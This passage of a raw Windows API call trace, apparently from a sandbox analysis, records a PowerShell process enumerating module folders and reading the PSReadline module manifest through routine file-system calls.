hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd500 | out: lpFindFileData=0x1b7dd500*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.330] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd500 | out: lpFindFileData=0x1b7dd500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.330] FindClose (in: hFindFile=0x1a9b6720 | out: hFindFile=0x1a9b6720) returned 1 [0182.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd760) returned 1 [0182.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd720) returned 1 [0182.330] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x1b7dd400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0182.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd840) returned 1 [0182.330] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd920 | out: lpFileInformation=0x1b7dd920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd800) returned 1 [0182.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd870) returned 1 [0182.331] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x1b7dd360, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0182.331] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", nBufferLength=0x105, lpBuffer=0x1b7dd300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", lpFilePart=0x0) returned 0x3d [0182.331] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x1b7dd510 | out: lpFindFileData=0x1b7dd510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.331] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd560 | out: lpFindFileData=0x1b7dd560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.332] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd560 | out: lpFindFileData=0x1b7dd560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.332] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd560 | out: lpFindFileData=0x1b7dd560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0182.332] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd7c0) returned 1 [0182.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd780) returned 1 [0182.332] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psd1")) returned 0xffffffff [0182.333] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psm1")) returned 0xffffffff [0182.333] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.cdxml")) returned 0xffffffff [0182.333] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.xaml")) returned 0xffffffff [0182.333] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.dll")) returned 0xffffffff [0182.333] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x1b7dd590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0182.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9d0) returned 1 [0182.333] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddab0 | out: lpFileInformation=0x1b7ddab0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd990) returned 1 [0182.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda00) returned 1 [0182.333] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x1b7dd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0182.333] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", lpFilePart=0x0) returned 0x3a [0182.333] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x1b7dd6a0 | out: lpFindFileData=0x1b7dd6a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b64e0 [0182.334] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.334] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0182.334] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.335] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0182.335] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0182.335] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0182.336] FindClose (in: hFindFile=0x1a9b64e0 | out: hFindFile=0x1a9b64e0) returned 1 [0182.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd950) returned 1 [0182.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd910) returned 1 [0182.336] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psd1")) returned 0xffffffff [0182.336] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psm1")) returned 0xffffffff [0182.336] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.cdxml")) returned 0xffffffff [0182.336] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.xaml")) returned 0xffffffff [0182.336] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.dll")) returned 0xffffffff [0182.336] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7dd720, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0182.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb60) returned 1 [0182.336] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc40 | out: lpFileInformation=0x1b7ddc40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb20) returned 1 [0182.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb90) returned 1 [0182.337] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0182.337] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0182.337] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b7dd830 | out: lpFindFileData=0x1b7dd830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6960 [0182.337] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.337] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0182.338] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.338] FindClose (in: hFindFile=0x1a9b6960 | out: hFindFile=0x1a9b6960) returned 1 [0182.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddae0) returned 1 [0182.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaa0) returned 1 [0182.338] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0182.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddbd0) returned 1 [0182.338] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddcb0 | out: lpFileInformation=0x1b7ddcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0182.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb90) returned 1 [0182.338] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0182.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd970) returned 1 [0182.338] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6cc [0182.339] GetFileType (hFile=0x6cc) returned 0x1 [0182.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8e0) returned 1 [0182.339] GetFileType (hFile=0x6cc) returned 0x1 [0182.339] ReadFile (in: hFile=0x6cc, lpBuffer=0x2233318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x2233318*, lpNumberOfBytesRead=0x1b7dda48*=0x2e1, lpOverlapped=0x0) returned 1 [0182.339] ReadFile (in: hFile=0x6cc, lpBuffer=0x2233318, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x2233318*, lpNumberOfBytesRead=0x1b7dda48*=0x0, lpOverlapped=0x0) returned 1 [0182.339] CloseHandle (hObject=0x6cc) returned 1 [0182.340] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0182.340] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff [0182.340] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff [0182.340] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff [0182.340] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff [0182.340] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0182.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddcf0) returned 1 [0182.340] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7dddd0 | out: lpFileInformation=0x1b7dddd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddcb0) returned 1 [0182.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddd20) returned 1 [0182.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd810, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0182.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7dd7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b [0182.341] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x1b7dd9c0 | out: lpFindFileData=0x1b7dd9c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6720 [0182.342] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dda10 | out: lpFindFileData=0x1b7dda10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.342] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dda10 | out: lpFindFileData=0x1b7dda10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0182.342] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dda10 | out: lpFindFileData=0x1b7dda10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0182.342] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dda10 | out: lpFindFileData=0x1b7dda10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, 